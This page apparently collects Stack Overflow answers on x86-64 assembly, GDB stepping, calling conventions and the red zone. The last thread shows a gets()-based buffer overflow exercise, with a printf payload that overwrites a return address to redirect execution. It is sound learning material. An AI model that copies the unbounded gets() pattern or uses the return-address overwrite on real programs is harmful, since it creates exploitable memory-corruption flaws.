How is main() called? Call to main() inside __libc_start_main() - c

I am trying to understand the call to main() inside __libc_start_main(). I know one of the parameters of __libc_start_main() is the address of main(). But, I am not able to figure out how is main() being called inside __libc_start_main() as there is no Opcode CALL or JMP. I see the following disassembly right before execution jumps to main().
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
I wrote a simple "Hello, World!!" in C. In the assembly above:
The execution jumps to main() right after instruction at address 0x7ffff7ded099.
Why is the MOV (to RAX) instruction causing a jump to main()?

Well, of course those instructions are not the ones that cause the call to main. I am not sure how you are stepping through those instructions, but if you are using GDB, you should use stepi instead of nexti.
I don't know why this happens precisely (some strange GDB or x86 quirk?) so I only speak from personal experience, but when reverse-engineering ELF binaries, I occasionally find that the nexti command executes several instructions before breaking. In your case, it misses a few movs before the actual call rax to call main().
What you can do to remediate this is to either use stepi, or to dump more code and then explicitly tell GDB to set breakpoints:
(gdb) x/20i
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
... more lines ...
... find call rax ...
(gdb) b *0x7ffff7dedXXX <= replace this
(gdb) continue
Here's what __libc_start_main() on my system does to call main():
21b6f: 48 8d 44 24 20 lea rax,[rsp+0x20] ; start preparing args
21b74: 64 48 89 04 25 00 03 mov QWORD PTR fs:0x300,rax
21b7b: 00 00
21b7d: 48 8b 05 24 93 3c 00 mov rax,QWORD PTR [rip+0x3c9324]
21b84: 48 8b 74 24 08 mov rsi,QWORD PTR [rsp+0x8]
21b89: 8b 7c 24 14 mov edi,DWORD PTR [rsp+0x14]
21b8d: 48 8b 10 mov rdx,QWORD PTR [rax]
21b90: 48 8b 44 24 18 mov rax,QWORD PTR [rsp+0x18] ; get address of main
21b95: ff d0 call rax ; actual call to main()
21b97: 89 c7 mov edi,eax
21b99: e8 32 16 02 00 call 431d0 <exit##GLIBC_2.2.5> ; exit(result of main)
The first three instructions are the same that you show. At the moment of call rax, rax will contain the address of main. After calling main, the result is moved into edi (first argument) and exit(result) is called.
Looking at glibc's source code for __libc_start_main(), we can see that this is exactly what happens:
/* ... */
#ifdef HAVE_CLEANUP_JMP_BUF
int not_first_call;
not_first_call = setjmp ((struct __jmp_buf_tag *) unwind_buf.cancel_jmp_buf);
if (__glibc_likely (! not_first_call))
{
/* ... a bunch of stuff ... */
/* Run the program. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
}
else
{
/* ... a bunch of stuff ... */
}
#else
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
#endif
exit (result);
}
In my case I can see from the disassembly that HAVE_CLEANUP_JMP_BUF was defined when my glibc was compiled, so the actual call to main() is the one inside the if. I also suspect this is the case for your glibc.

Related

Change on rax register during debug session with gdb does not affect code execution

I'm planning to participate to some of the Capture the flags (CTF) challenges, in the near future. For that reason, I've decided to study assembly. As of now I'm focusing on the usage of the CPU registers. Following some examples that I have found on internet, I tried to debug a very simple "Hello World" program written in C, to see how the CPU registers are used. My environment is Linux and GCC version 11. I compiled my code with the -g flag, in order to include debug symbols.
Following is my very simple C source code:
#include <iostream>
int main (int argc, char** argv)
{
char message_c_str[] = "Hello World from C!";
printf("%s\n", message_c_str);
return 0;
}
Studying the disassembly of the main function, I understand that the string containing the message gets stored inside the RAX (and RDX registers?), before calling the printf function:
└─$ objdump -M intel -D main| grep -A20 main.:
0000000000001159 <main>:
1159: 55 push rbp
115a: 48 89 e5 mov rbp,rsp
115d: 48 83 ec 30 sub rsp,0x30
1161: 89 7d dc mov DWORD PTR [rbp-0x24],edi
1164: 48 89 75 d0 mov QWORD PTR [rbp-0x30],rsi
1168: 48 b8 48 65 6c 6c 6f movabs rax,0x6f57206f6c6c6548
116f: 20 57 6f
1172: 48 ba 72 6c 64 20 66 movabs rdx,0x6d6f726620646c72
1179: 72 6f 6d
117c: 48 89 45 e0 mov QWORD PTR [rbp-0x20],rax
1180: 48 89 55 e8 mov QWORD PTR [rbp-0x18],rdx
1184: c7 45 f0 20 43 21 00 mov DWORD PTR [rbp-0x10],0x214320
118b: 48 8d 45 e0 lea rax,[rbp-0x20]
118f: 48 89 c7 mov rdi,rax
1192: e8 b9 fe ff ff call 1050 <puts#plt>
1197: b8 00 00 00 00 mov eax,0x0
119c: c9 leave
119d: c3 ret
I thought to start a debug session and try to change the RAX on the fly, just for the sake of seeing if I was able to change the string content before printing it on the command line. Unfortunately, even though it seems that I can change the RAX value, the program still prints the hard coded message. So, I'm not sure why I cannot change it. Am I missing to run any gdb command after updating the value of RAX?
Following is my debug session with the issue:
┌──(alexis㉿kali)-[~/Desktop/Hacking/hello_world]
└─$ gdb -q main
Reading symbols from main...
(gdb) break main
Breakpoint 1 at 0x1168: file /home/alexis/Desktop/Hacking/hello_world/main.cpp, line 5.
(gdb) run
Starting program: /home/alexis/Desktop/Hacking/hello_world/main
Breakpoint 1, main (argc=1, argv=0x7fffffffdf58) at
/home/alexis/Desktop/Hacking/hello_world/main.cpp:5
5 char message_c_str[] = "Hello World from C!";
(gdb) info register rax
rax 0x555555555159 93824992235865
(gdb) next
6 printf("%s\n", message_c_str);
(gdb) info register rax
rax 0x6f57206f6c6c6548 8022916924116329800
(gdb) set $rax=0x6361636361
(gdb) info register rax
rax 0x6361636361 426835665761
(gdb) next
Hello World from C!
8 return 0;
(gdb)
You can see that the code still prints "Hello World from C!", even if the RAX register changed. Why?
The string is only temporarily in rax+rdx. In the following lines it is placed on the stack and the address goes to rdi, that is used by puts.
What's important here is to understand that one line of source code is translated to multiple lines of assembly. When you change the rax on line printf("%s\n", message_c_str); the string is already pushed on the stack and rax only keeps an old value as it wasn't overwritten by anything. It is no longer the string that's being printed.
To accomplish your goal you would have to change the string on the stack or change it in rax before it's being pushed onto it (so before your next command).
Also be aware that next advances one source code line. If you want to move one assembly instruction use nexti - with that you have more control about what gets executed.
You're using next (whole block of asm corresponding to a C source line), not nexti or stepi (aka ni or si) to step by asm instruction.
And you made a debug build so GCC doesn't keep anything in registers across C statements. The points where execution stops with next are the ones where the compiler-generated instructions are about to load or LEA a new RAX, so its current value is dead and doesn't matter.
(And it's only using RAX at all because it's a debug build with GCC; otherwise things like lea rax,[rbp-0x20] / mov rdi,rax would LEA straight into RDI, instead of uselessly using RAX as a temporary. Return value from writing an unused parameter when falling off the end of a non-void function Or for mov-immediate to memory, there's no mov r/m64, imm64, only to register, so those moves to RAX and RDX do make sense.)
If you wanted to have it print something different, you could si until after movabs rax,0x6f57206f6c6c6548 but before mov QWORD PTR [rbp-0x20],rax, and at that point change the initializer for part of the string data. (Which is in RAX at that point.) e.g. introducing a 0x00 byte will terminate the C string.
Or right before the call puts, you could set $rdi = $rdi+5 to be like puts(message_c_str + 5).
layout reg or layout asm (use layout next / prev to fix the display if its broken) are helpful for seeing where execution is. See other GDB asm tips at the bottom of https://stackoverflow.com/tags/x86/info

Why does GCC use additional registers for pushing values onto the stack? [duplicate]

This question already has an answer here:
Why does the x86-64 System V calling convention pass args in registers instead of just the stack?
(1 answer)
Closed 8 months ago.
This C code
void test_function(int a, int b, int c, int d) {}
int main() {
test_function(1, 2, 3, 4);
return 0;
}
gets compiled by GCC (no flags, version 12.1.1, target x86_64-redhat-linux) into
0000000000401106 <test_function>:
401106: 55 push rbp
401107: 48 89 e5 mov rbp,rsp
40110a: 89 7d fc mov DWORD PTR [rbp-0x4],edi
40110d: 89 75 f8 mov DWORD PTR [rbp-0x8],esi
401110: 89 55 f4 mov DWORD PTR [rbp-0xc],edx
401113: 89 4d f0 mov DWORD PTR [rbp-0x10],ecx
401116: 90 nop
401117: 5d pop rbp
401118: c3 ret
0000000000401119 <main>:
401119: 55 push rbp
40111a: 48 89 e5 mov rbp,rsp
40111d: b9 04 00 00 00 mov ecx,0x4
401122: ba 03 00 00 00 mov edx,0x3
401127: be 02 00 00 00 mov esi,0x2
40112c: bf 01 00 00 00 mov edi,0x1
401131: e8 d0 ff ff ff call 401106 <test_function>
401136: b8 00 00 00 00 mov eax,0x0
40113b: 5d pop rbp
40113c: c3 ret
Why are additional registers (ecx, edx, esi, edi) used as intermediary storage for values 1, 2, 3, 4 instead of putting them into rbp directly?
"as intermediary storage": You confusion seems to be this part.
The ABI specifies that these function arguments are passed in the registers you are seeing (see comments under the question). The registers are not just used as intermediary. The value are never supposed to be put on the stack at all. They stay in the register the whole time, unless the function needs to reuse the register for something else or pass on a pointer to the function parameter or something similar.
What you are seeing in test_function is just an artifact of not compiling with optimizations enabled. The mov instructions putting the registers on the stack are pointless, since nothing is done with them afterwards. The stack pointer is just immediately restored and then the function returns.
The whole function should just be a single ret instruction. See https://godbolt.org/z/qG9GjMohY where -O2 is used.
Without optimizations enabled the compiler makes no attempt to remove instructions even if they are pointless and it always stores values of variables to memory and loads them from memory again, even if they could have been held in registers. That's why it is almost always pointless to look at -O0 assembly.
The registers are used for the arguments to call the function. The standard calling convertion calls for aguments to be placed in certain register, so the code you see in main puts the arguments into those registers and the code in test_function expects them in those registers and reads them from there.
So your follow-on question might be "why is test_function copying those argument on to the stack?". That's because you're compiling without optimization, so the compiler produces inefficient code, allocation space in the stack frame for every argument and local var and copying the arguments from their input register into the stack frame as part of the function prolog. If you were to use those values in th function, you would see it reading them from the stack frame locations even though they are probably still in the registers. If you compile with -O, you'll see the compiler get rid of all this, as the stack frame is not needed.

Why does this function returns size of array when there is no return statement?

I'm getting output as 8 for this program. Why is this function returning size of array when there is no return statement? It is working properly when I write the return statement but I'm still curious why this function is returning the size of array. I thought it should return garbage value.
#include <stdio.h>
int sumofelements(int A[],int size)
{
int i,sum=0;
for(i=0;i<size;i++)
sum = sum + A[i];
}
int main()
{
int A[]={3,4,5,6,3,6,1,10};
int size=sizeof(A)/sizeof(A[0]);
int total=sumofelements(A,size);
printf("sum of the elements=%d",total);
}
The behavior is undefined. Any value is possible, including the observed behavior. And on some exotic architectures, a trap value might cause other strange behavior.
For your particular case, the place where sumofelements is expected by main to have placed its return value (some CPU register) happens to contain the value of size, but no guarantee whatsoever: it might not on a different combination of CPU/OS/compiler/set of options/time of day...
Use gcc -Wall -Werror or a similar warning level to avoid such silly mistakes.
You can look at the assembly and behavior on Godbolt's Compiler Explorer and play with compiler flags and compiler versions to see how volatile the behavior is. With -O2, both gcc and clang generate a simple ret instruction for sumofelements and do not even call this function for the printf call.
Not explicitly returning a value from a non-void function (except main()) results in Undefined behavior. This means that anything can happen: a crash, returning garbage value, or worse of all, the expected value!
You should always return something (meaningful) from a non-void function.
Return values are picked from eax which is a register on your CPU (registers are like your CPU’s own place to store some small amounts of data outside of RAM) it happened to be that eax contained the size of the array just before your function ended.
Probably in i < size, size is stored in eax and is not modified any further until your function ends, but you would have to objdump -d your program and paste it here for me to say anything certain.
If you want to learn more type “CPU registers” and read some stuff online.
I will extend my answer just for the sake of doing it.
OK, I copied your code and compiled it using GCC MinGW and disassembled it using objdump. Now here is the disassembly:
<sumofelements>:
0000000000000000 <sumofelements>:
0: 55 push rbp
1: 48 89 e5 mov rbp,rsp
4: 48 89 7d e8 mov QWORD PTR [rbp-0x18],rdi
8: 89 75 e4 mov DWORD PTR [rbp-0x1c],esi
b: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0
12: c7 45 fc 00 00 00 00 mov DWORD PTR [rbp-0x4],0x0
19: eb 1d jmp 38 <sumofelements+0x38>
1b: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
1e: 48 98 cdqe
20: 48 8d 14 85 00 00 00 lea rdx,[rax*4+0x0]
27: 00
28: 48 8b 45 e8 mov rax,QWORD PTR [rbp-0x18]
2c: 48 01 d0 add rax,rdx
2f: 8b 00 mov eax,DWORD PTR [rax]
31: 01 45 f8 add DWORD PTR [rbp-0x8],eax
34: 83 45 fc 01 add DWORD PTR [rbp-0x4],0x1
38: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
3b: 3b 45 e4 cmp eax,DWORD PTR [rbp-0x1c]
3e: 7c db jl 1b <sumofelements+0x1b>
40: 90 nop
41: 5d pop rbp
42: c3 ret
If you examine the disassembly you can see that the last modification of eax was at the 38th byte, after that the loop ends and we return. This line in particular
mov eax,DWORD PTR [rbp-0x4]
is the line before the loop checks for i < size. The line moves [rbp-0x4] to eax. If we go back to the start of the program, we can see that [rbp-0x4] is i.
Considering all of this, everything makes sense. For the loop to end i < size must resolve to false. Since size is 8, i must also be 8 for the loop to end. The value of i is moved into eax to check if it smaller than size and at the iteration that the loop ends i would have the value of 8 and therefore eax would also be 8. The loop ends and we return what is in eax. So as a matter of fact it wasn't size in eax like my initial guess but it was rather i

Compiler using local variables without adjusting RSP

In question Compilers: Understanding assembly code generated from small programs the compiler uses two local variables without adjusting the stack pointer.
Not adjusting RSP for the use of local variables seems not interrupt safe and so the compiler seems to rely on the hardware automatically switching to a system stack when interrupts occur. Otherwise, the first interrupt that came along would push the instruction pointer onto the stack and would overwrite the local variable.
The code from that question is:
#include <stdio.h>
int main()
{
for(int i=0;i<10;i++){
int k=0;
}
}
The assembly code generated by that compiler is:
00000000004004d6 <main>:
4004d6: 55 push rbp
4004d7: 48 89 e5 mov rbp,rsp
4004da: c7 45 f8 00 00 00 00 mov DWORD PTR [rbp-0x8],0x0
4004e1: eb 0b jmp 4004ee <main+0x18>
4004e3: c7 45 fc 00 00 00 00 mov DWORD PTR [rbp-0x4],0x0
4004ea: 83 45 f8 01 add DWORD PTR [rbp-0x8],0x1
4004ee: 83 7d f8 09 cmp DWORD PTR [rbp-0x8],0x9
4004f2: 7e ef jle 4004e3 <main+0xd>
4004f4: b8 00 00 00 00 mov eax,0x0
4004f9: 5d pop rbp
4004fa: c3 ret
The local variables are i at [rbp-0x8] and k at [rbp-0x4].
Can anyone shine light on this interrupt problem? Does the hardware indeed switch to a system stack? How? Am I wrong in my understanding?
This is the so called "red zone" of the x86-64 ABI. A summary from wikipedia:
In computing, a red zone is a fixed-size area in a function's stack frame beyond the current stack pointer which is not preserved by that function. The callee function may use the red zone for storing local variables without the extra overhead of modifying the stack pointer. This region of memory is not to be modified by interrupt/exception/signal handlers. The x86-64 ABI used by System V mandates a 128-byte red zone which begins directly under the current value of the stack pointer.
In 64-bit Linux user code it is OK, as long as no more than 128 bytes are used. It is an optimization used most prominently by leaf-functions, i.e. functions which don't call other functions,
If you were to compile the example program as a 64-bit Linux program with GCC (or compatible compiler) using the -mno-red-zone option you'd see code like this generated:
main:
push rbp
mov rbp, rsp
sub rsp, 16; <<============ Observe RSP is now being adjusted.
mov DWORD PTR [rbp-4], 0
.L3:
cmp DWORD PTR [rbp-4], 9
jg .L2
mov DWORD PTR [rbp-8], 0
add DWORD PTR [rbp-4], 1
jmp .L3
.L2:
mov eax, 0
leave
ret
This code generation can be observed at this godbolt.org link.
For a 32-bit Linux user program it would be a bad thing not to adjust the stack pointer. If you were to compile the code in the question as 32-bit code (using -m32 option) main would appear something like the following code:
main:
push ebp
mov ebp, esp
sub esp, 16; <<============ Observe ESP is being adjusted.
mov DWORD PTR [ebp-4], 0
.L3:
cmp DWORD PTR [ebp-4], 9
jg .L2
mov DWORD PTR [ebp-8], 0
add DWORD PTR [ebp-4], 1
jmp .L3
.L2:
mov eax, 0
leave
ret
This code generation can be observed at this gotbolt.org link.

Buffer overflow appeared before it is expected

I'm trying to take a control over a stack overflow. First, here is an example of C code I compiled on an x32 VM Linux (gcc -fno-stack-protector -ggdb -o first first.c),
#include "stdio.h"
int CanNeverExecute()
{
printf("I can never execute\n");
return(0);
}
void GetInput()
{
char buffer[8];
gets(buffer);
puts(buffer);
}
int main()
{
GetInput();
return(0);
}
Then debugger (intel flavor): dump of assembler code for function GetInput:
0x08048455 <+0>: push ebp
0x08048456 <+1>: mov ebp,esp
0x08048458 <+3>: sub esp,0x28
0x0804845b <+6>: lea eax,[ebp-0x10]
Here we can see that sub esp, 0x28 reserves 40 bytes for a buffer variable (Right?).
CanNeverExecute function is located in address 0x0804843c.
So, in order to run CanNeverExecute function, I need to put 40 bytes into buffer variable, then goes 8 bytes for stored base pointer and then 8 bytes of return pointer I want to change.
So, I need a string of 48 ASCII symbols plus \x3c\x84\x04\x08 in the end (address of the CanNeverExecute function). That is in theory. But In practice I need only 20 bytes before address of the return pointer:
~/hacktest $ printf "12345678901234567890\x3c\x84\x04\x08" | ./first
12345678901234567890..
I can never execute
Illegal instruction (core dumped)
Why does it need only 20 bytes instead of 48? Where is my mistake?
First off, your assembly is 32-bit. Saved EBP and return address are 4 bytes each.
Second, the buffer variable does not start at stack top (ESP) - it starts at ebp-0x10. Which is 20 bytes away from the return address. 0x10 is 16 bytes, then 4 more for the saved EBP.
If You take bigger part of dissassembly You will see:
08048445 <GetInput>:
8048445: 55 push %ebp
8048446: 89 e5 mov %esp,%ebp
8048448: 83 ec 28 sub $0x28,%esp
804844b: 8d 45 f0 lea -0x10(%ebp),%eax
804844e: 89 04 24 mov %eax,(%esp)
8048451: e8 9a fe ff ff call 80482f0 <gets#plt>
8048456: 8d 45 f0 lea -0x10(%ebp),%eax
8048459: 89 04 24 mov %eax,(%esp)
804845c: e8 9f fe ff ff call 8048300 <puts#plt>
8048461: c9 leave
8048462: c3 ret
ebp is saved, esp is moved to ebp, then 40 is subtracted from esp (stack frame, as you wrote),
but pointer to buffer is passed to gets via eax register, and eax is loaded with ebp-0x10!
lea -0x10(%ebp),%eax
So You need only 20 bytes to overflow the buffer (16 reserved + 4 for stored base pointer on 32-bit system)

Resources